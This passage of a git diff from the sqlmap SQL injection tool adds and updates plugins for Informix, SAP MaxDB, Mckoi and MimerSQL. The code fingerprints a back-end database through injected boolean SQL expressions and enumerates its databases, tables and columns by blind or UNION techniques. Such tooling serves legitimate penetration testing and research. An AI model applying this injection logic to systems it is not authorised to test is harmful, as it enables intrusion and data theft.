return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(INFORMIX_ALIASES): + setDbms(DBMS.INFORMIX) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.INFORMIX + logger.info(infoMsg) + + result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSMASTER:SYSDUAL)") + + if result: + infoMsg = "confirming %s" % DBMS.INFORMIX + logger.info(infoMsg) + + result = inject.checkBooleanExpression("(SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL) IS NOT NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX + logger.warning(warnMsg) + + return False + + # Determine if it is Informix >= 11.70 + if inject.checkBooleanExpression("CHR(32)=' '"): + Backend.setVersion(">= 11.70") + + setDbms(DBMS.INFORMIX) + + self.getBanner() + + if not conf.extensiveFp: + return True + + infoMsg = "actively fingerprinting %s" % DBMS.INFORMIX + logger.info(infoMsg) + + for version in ("14.1", "12.1", "11.7", "11.5", "10.0"): + output = inject.checkBooleanExpression("EXISTS(SELECT 1 FROM SYSMASTER:SYSDUAL WHERE DBINFO('VERSION','FULL') LIKE '%%%s%%')" % version) + + if output: + Backend.setVersion(version) + break + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/informix/syntax.py b/plugins/dbms/informix/syntax.py new file mode 100644 index 00000000000..430664adec4 --- /dev/null +++ b/plugins/dbms/informix/syntax.py @@ -0,0 +1,42 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.common import isDBMSVersionAtLeast +from lib.core.common import randomStr +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> from lib.core.common import Backend + >>> Backend.setVersion('12.10') + ['12.10'] + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHR(%d)" % _ for _ in getOrds(value)) + + retVal = expression + + if isDBMSVersionAtLeast("11.70"): + excluded = {} + for _ in re.findall(r"DBINFO\([^)]+\)", expression): + excluded[_] = randomStr() + expression = expression.replace(_, excluded[_]) + + retVal = Syntax._escape(expression, quote, escaper) + + for _ in excluded.items(): + retVal = retVal.replace(_[1], _[0]) + + return retVal diff --git a/plugins/dbms/informix/takeover.py b/plugins/dbms/informix/takeover.py new file mode 100644 index 00000000000..7c19fd8799c --- /dev/null +++ b/plugins/dbms/informix/takeover.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def
__init__(self): + self.__basedir = None + self.__datadir = None + + GenericTakeover.__init__(self) diff --git a/plugins/dbms/maxdb/__init__.py b/plugins/dbms/maxdb/__init__.py index 57cd31334c1..fbf06a37e08 100644 --- a/plugins/dbms/maxdb/__init__.py +++ b/plugins/dbms/maxdb/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -23,11 +23,7 @@ class MaxDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Take def __init__(self): self.excludeDbsList = MAXDB_SYSTEM_DBS - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.MAXDB] = Syntax.escape diff --git a/plugins/dbms/maxdb/connector.py b/plugins/dbms/maxdb/connector.py index b05bf8a6d92..73b8864d24d 100644 --- a/plugins/dbms/maxdb/connector.py +++ b/plugins/dbms/maxdb/connector.py @@ -1,18 +1,15 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.connector import Connector as GenericConnector class Connector(GenericConnector): - def __init__(self): - GenericConnector.__init__(self) - def connect(self): - errMsg = "on SAP MaxDB it is not possible to establish a " + errMsg = "on SAP MaxDB it is not (currently) possible to establish a " errMsg += "direct connection" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py index 80fab44e33c..ab791f6e74c 100644 --- a/plugins/dbms/maxdb/enumeration.py +++ b/plugins/dbms/maxdb/enumeration.py @@ -1,23 +1,33 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -from lib.core.common import Backend -from lib.core.common import randomStr +import re + +from lib.core.common import isListLike +from lib.core.common import isTechniqueAvailable +from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.data import paths from lib.core.data import queries +from lib.core.enums import DBMS +from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapNoneDataException +from lib.core.exception import SqlmapUserQuitException from lib.core.settings import CURRENT_DB +from lib.utils.brute import columnExists from lib.utils.pivotdumptable import pivotDumpTable from plugins.generic.enumeration import Enumeration as GenericEnumeration +from thirdparty import six +from thirdparty.six.moves import zip as _zip class Enumeration(GenericEnumeration): def __init__(self): @@ -27,7 +37,7 @@ def __init__(self): def 
getPasswordHashes(self): warnMsg = "on SAP MaxDB it is not possible to enumerate the user password hashes" - logger.warn(warnMsg) + logger.warning(warnMsg) return {} @@ -38,13 +48,12 @@ def getDbs(self): infoMsg = "fetching database names" logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].dbs - randStr = randomStr() + rootQuery = queries[DBMS.MAXDB].dbs query = rootQuery.inband.query - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.schemaname' % randStr], blind=True) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.schemaname' % kb.aliasName], blind=True) if retVal: - kb.data.cachedDbs = retVal[0].values()[0] + kb.data.cachedDbs = next(six.itervalues(retVal[0])) if kb.data.cachedDbs: kb.data.cachedDbs.sort() @@ -61,26 +70,26 @@ def getTables(self, bruteForce=None): conf.db = self.getCurrentDb() if conf.db: - dbs = conf.db.split(",") + dbs = conf.db.split(',') else: dbs = self.getDbs() - for db in filter(None, dbs): + for db in (_ for _ in dbs if _): dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db) infoMsg = "fetching tables for database" - infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, basestring) else db[0] for db in sorted(dbs))) + infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, six.string_types) else db[0] for db in sorted(dbs))) logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].tables + rootQuery = queries[DBMS.MAXDB].tables for db in dbs: - randStr = randomStr() query = rootQuery.inband.query % (("'%s'" % db) if db != "USER" else 'USER') - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.tablename' % randStr], blind=True) + blind = not isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.tablename' % kb.aliasName], blind=blind) if retVal: - for table in retVal[0].values()[0]: + for table in list(retVal[0].values())[0]: if db not in kb.data.cachedTables: kb.data.cachedTables[db] = [table] else: @@ -91,7 +100,7 @@ def getTables(self, bruteForce=None): return kb.data.cachedTables - def getColumns(self, onlyColNames=False): + def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: @@ -99,27 +108,38 @@ def getColumns(self, onlyColNames=False): warnMsg = "missing database parameter. 
sqlmap is going " warnMsg += "to use the current database to enumerate " warnMsg += "table(s) columns" - logger.warn(warnMsg) + logger.warning(warnMsg) conf.db = self.getCurrentDb() elif conf.db is not None: - if ',' in conf.db: + if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) conf.db = safeSQLIdentificatorNaming(conf.db) + if conf.col: + colList = conf.col.split(',') + else: + colList = [] + + if conf.exclude: + colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] + + for col in colList: + colList[colList.index(col)] = safeSQLIdentificatorNaming(col) + if conf.tbl: - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') else: self.getTables() if len(kb.data.cachedTables) > 0: - tblList = kb.data.cachedTables.values() + tblList = list(kb.data.cachedTables.values()) - if isinstance(tblList[0], (set, tuple, list)): + if tblList and isListLike(tblList[0]): tblList = tblList[0] else: errMsg = "unable to retrieve the tables " @@ -129,32 +149,74 @@ def getColumns(self, onlyColNames=False): for tbl in tblList: tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) - rootQuery = queries[Backend.getIdentifiedDbms()].columns + if bruteForce: + resumeAvailable = False + + for tbl in tblList: + for db, table, colName, colType in kb.brute.columns: + if db == conf.db and table == tbl: + resumeAvailable = True + break + + if resumeAvailable and not conf.freshQueries or colList: + columns = {} + + for column in colList: + columns[column] = None + + for tbl in tblList: + for db, table, colName, colType in kb.brute.columns: + if db == conf.db and table == tbl: + columns[colName] = colType + + if conf.db in kb.data.cachedColumns: + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns + else: + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): columns} + + return kb.data.cachedColumns + + message = "do you want to use common column existence check? 
[y/N/q] " + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() + + if choice == 'N': + return + elif choice == 'Q': + raise SqlmapUserQuitException + else: + return columnExists(paths.COMMON_COLUMNS) + + rootQuery = queries[DBMS.MAXDB].columns for tbl in tblList: - if conf.db is not None and len(kb.data.cachedColumns) > 0 \ - and conf.db in kb.data.cachedColumns and tbl in \ - kb.data.cachedColumns[conf.db]: + if conf.db is not None and len(kb.data.cachedColumns) > 0 and conf.db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[conf.db]: infoMsg = "fetched tables' columns on " infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) return {conf.db: kb.data.cachedColumns[conf.db]} + if dumpMode and colList: + table = {} + table[safeSQLIdentificatorNaming(tbl, True)] = dict((_, None) for _ in colList) + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table + continue + infoMsg = "fetching columns " infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) infoMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) - randStr = randomStr() + blind = not isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) + query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), ("'%s'" % unsafeSQLIdentificatorNaming(conf.db)) if unsafeSQLIdentificatorNaming(conf.db) != "USER" else 'USER') - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.columnname' % randStr, '%s.datatype' % randStr, '%s.len' % randStr], blind=True) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.columnname' % kb.aliasName, '%s.datatype' % kb.aliasName, '%s.len' % kb.aliasName], blind=blind) if retVal: table = {} columns = {} - for columnname, datatype, length in zip(retVal[0]["%s.columnname" % randStr], retVal[0]["%s.datatype" % randStr], retVal[0]["%s.len" % randStr]): + for columnname, datatype, length in _zip(retVal[0]["%s.columnname" % kb.aliasName], retVal[0]["%s.datatype" % kb.aliasName], retVal[0]["%s.len" % kb.aliasName]): columns[safeSQLIdentificatorNaming(columnname)] = "%s(%s)" % (datatype, length) table[tbl] = columns @@ -162,18 +224,22 @@ def getColumns(self, onlyColNames=False): return kb.data.cachedColumns - def getPrivileges(self, *args): + def getPrivileges(self, *args, **kwargs): warnMsg = "on SAP MaxDB it is not possible to enumerate the user privileges" - logger.warn(warnMsg) + logger.warning(warnMsg) return {} - def searchDb(self): - warnMsg = "on SAP MaxDB it is not possible to search databases" - logger.warn(warnMsg) - - return [] + def search(self): + warnMsg = "on SAP MaxDB search option is not available" + logger.warning(warnMsg) def getHostname(self): warnMsg = "on SAP MaxDB it is not possible to enumerate the hostname" - logger.warn(warnMsg) + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on SAP MaxDB it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/maxdb/filesystem.py b/plugins/dbms/maxdb/filesystem.py index 43fd29d2710..04f14201059 100644 --- a/plugins/dbms/maxdb/filesystem.py +++ b/plugins/dbms/maxdb/filesystem.py @@ -1,21 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from 
plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): + def readFile(self, remoteFile): errMsg = "on SAP MaxDB reading of files is not supported" raise SqlmapUnsupportedFeatureException(errMsg) - def writeFile(self, wFile, dFile, fileType=None): + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): errMsg = "on SAP MaxDB writing of files is not supported" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/maxdb/fingerprint.py b/plugins/dbms/maxdb/fingerprint.py index c808e6d6bee..53c27d55b9d 100644 --- a/plugins/dbms/maxdb/fingerprint.py +++ b/plugins/dbms/maxdb/fingerprint.py @@ -1,13 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.agent import agent from lib.core.common import Backend from lib.core.common import Format +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -33,7 +34,7 @@ def _versionCheck(self): if not result: warnMsg = "unable to perform %s version check" % DBMS.MAXDB - logger.warn(warnMsg) + logger.warning(warnMsg) return None @@ -91,7 +92,7 @@ def getFingerprint(self): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(MAXDB_ALIASES) or conf.dbms in MAXDB_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(MAXDB_ALIASES): setDbms(DBMS.MAXDB) self.getBanner() @@ -111,7 +112,7 @@ def checkDbms(self): if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.MAXDB - logger.warn(warnMsg) + logger.warning(warnMsg) return False @@ -122,7 +123,7 @@ def checkDbms(self): return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.MAXDB - logger.warn(warnMsg) + logger.warning(warnMsg) return False diff --git a/plugins/dbms/maxdb/syntax.py b/plugins/dbms/maxdb/syntax.py index 44b62b3321f..17a0a02c257 100644 --- a/plugins/dbms/maxdb/syntax.py +++ b/plugins/dbms/maxdb/syntax.py @@ -1,16 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar" + True + """ + return expression diff --git a/plugins/dbms/maxdb/takeover.py b/plugins/dbms/maxdb/takeover.py index b6914b71c48..e93813f99ea 100644 --- a/plugins/dbms/maxdb/takeover.py +++ b/plugins/dbms/maxdb/takeover.py @@ -1,17 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.exception import SqlmapUnsupportedFeatureException from plugins.generic.takeover import Takeover as GenericTakeover class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - def 
osCmd(self): errMsg = "on SAP MaxDB it is not possible to execute commands" raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/mckoi/__init__.py b/plugins/dbms/mckoi/__init__.py new file mode 100644 index 00000000000..eafd1d3c868 --- /dev/null +++ b/plugins/dbms/mckoi/__init__.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import MCKOI_SYSTEM_DBS +from lib.core.unescaper import unescaper +from plugins.dbms.mckoi.enumeration import Enumeration +from plugins.dbms.mckoi.filesystem import Filesystem +from plugins.dbms.mckoi.fingerprint import Fingerprint +from plugins.dbms.mckoi.syntax import Syntax +from plugins.dbms.mckoi.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class MckoiMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Mckoi methods + """ + + def __init__(self): + self.excludeDbsList = MCKOI_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.MCKOI] = Syntax.escape diff --git a/plugins/dbms/mckoi/connector.py b/plugins/dbms/mckoi/connector.py new file mode 100644 index 00000000000..fe9093e7b99 --- /dev/null +++ b/plugins/dbms/mckoi/connector.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + def connect(self): + errMsg = "on Mckoi it is not (currently) possible to establish a " + errMsg += "direct connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/mckoi/enumeration.py b/plugins/dbms/mckoi/enumeration.py new file mode 100644 index 00000000000..9ccc431eaa4 --- /dev/null +++ b/plugins/dbms/mckoi/enumeration.py @@ -0,0 +1,84 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getBanner(self): + warnMsg = "on Mckoi it is not possible to get the banner" + logger.warning(warnMsg) + + return None + + def getCurrentUser(self): + warnMsg = "on Mckoi it is not possible to enumerate the current user" + logger.warning(warnMsg) + + def getCurrentDb(self): + warnMsg = "on Mckoi it is not possible to get name of the current database" + logger.warning(warnMsg) + + def isDba(self, user=None): + warnMsg = "on Mckoi it is not possible to test if current user is DBA" + logger.warning(warnMsg) + + def getUsers(self): + warnMsg = "on Mckoi it is not possible to enumerate the users" + logger.warning(warnMsg) + + return [] + + def getPasswordHashes(self): + warnMsg = "on Mckoi it is not possible to enumerate the user password hashes" + logger.warning(warnMsg) + + return {} + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on Mckoi it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getDbs(self): + warnMsg = "on Mckoi it is not possible to enumerate databases (use only '--tables')" + logger.warning(warnMsg) + + return [] + + def searchDb(self): + warnMsg = "on 
Mckoi it is not possible to search databases" + logger.warning(warnMsg) + + return [] + + def searchTable(self): + warnMsg = "on Mckoi it is not possible to search tables" + logger.warning(warnMsg) + + return [] + + def searchColumn(self): + warnMsg = "on Mckoi it is not possible to search columns" + logger.warning(warnMsg) + + return [] + + def search(self): + warnMsg = "on Mckoi search option is not available" + logger.warning(warnMsg) + + def getHostname(self): + warnMsg = "on Mckoi it is not possible to enumerate the hostname" + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on Mckoi it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/mckoi/filesystem.py b/plugins/dbms/mckoi/filesystem.py new file mode 100644 index 00000000000..66d946579f4 --- /dev/null +++ b/plugins/dbms/mckoi/filesystem.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on Mckoi it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + errMsg = "on Mckoi it is not possible to write files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/mckoi/fingerprint.py b/plugins/dbms/mckoi/fingerprint.py new file mode 100644 index 00000000000..312f3e3c16f --- /dev/null +++ b/plugins/dbms/mckoi/fingerprint.py @@ -0,0 +1,93 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import MCKOI_ALIASES +from lib.core.settings import MCKOI_DEFAULT_SCHEMA +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.MCKOI) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.MCKOI + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(MCKOI_ALIASES): + setDbms(DBMS.MCKOI) + return True + + infoMsg = "testing %s" % DBMS.MCKOI + logger.info(infoMsg) + + result = inject.checkBooleanExpression("DATEOB()>=DATEOB(NULL)") + + if result: + infoMsg = 
"confirming %s" % DBMS.MCKOI + logger.info(infoMsg) + + result = inject.checkBooleanExpression("ABS(1/0)>ABS(0/1)") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.MCKOI + logger.warning(warnMsg) + + return False + + setDbms(DBMS.MCKOI) + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.MCKOI + logger.warning(warnMsg) + + return False + + def forceDbmsEnum(self): + conf.db = MCKOI_DEFAULT_SCHEMA diff --git a/plugins/dbms/mckoi/syntax.py b/plugins/dbms/mckoi/syntax.py new file mode 100644 index 00000000000..17a0a02c257 --- /dev/null +++ b/plugins/dbms/mckoi/syntax.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar" + True + """ + + return expression diff --git a/plugins/dbms/mckoi/takeover.py b/plugins/dbms/mckoi/takeover.py new file mode 100644 index 00000000000..d22277b674d --- /dev/null +++ b/plugins/dbms/mckoi/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Mckoi it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Mckoi it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Mckoi it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Mckoi it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/mimersql/__init__.py b/plugins/dbms/mimersql/__init__.py new file mode 100644 index 00000000000..af8f2232ea5 --- /dev/null +++ b/plugins/dbms/mimersql/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import MIMERSQL_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.mimersql.enumeration import Enumeration +from plugins.dbms.mimersql.filesystem import Filesystem +from plugins.dbms.mimersql.fingerprint import Fingerprint +from plugins.dbms.mimersql.syntax import Syntax +from plugins.dbms.mimersql.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class MimerSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines MimerSQL methods + """ + + def __init__(self): + self.excludeDbsList = MIMERSQL_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.MIMERSQL] = Syntax.escape diff --git a/plugins/dbms/mimersql/connector.py b/plugins/dbms/mimersql/connector.py new file mode 100644 index 00000000000..e6bcced6b96 --- /dev/null +++ b/plugins/dbms/mimersql/connector.py @@ -0,0 +1,59 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 
sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import mimerpy +except: + pass + +import logging + +from lib.core.common import getSafeExString +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://github.com/mimersql/MimerPy + User guide: https://github.com/mimersql/MimerPy/blob/master/README.rst + API: https://www.python.org/dev/peps/pep-0249/ + License: MIT + """ + + def connect(self): + self.initConnection() + + try: + self.connector = mimerpy.connect(hostname=self.hostname, username=self.user, password=self.password, database=self.db, port=self.port, connect_timeout=conf.timeout) + except mimerpy.OperationalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except mimerpy.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + return None + + def execute(self, query): + try: + self.cursor.execute(query) + except (mimerpy.OperationalError, mimerpy.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except mimerpy.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.connector.commit() + + def select(self, query): + self.execute(query) + return self.fetchall() diff --git a/plugins/dbms/mimersql/enumeration.py b/plugins/dbms/mimersql/enumeration.py new file mode 100644 index 00000000000..85ea9c93f28 --- /dev/null +++ b/plugins/dbms/mimersql/enumeration.py @@ -0,0 +1,32 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getPasswordHashes(self): + warnMsg = "on MimerSQL it is not possible to enumerate password hashes" + logger.warning(warnMsg) + + return {} + + def 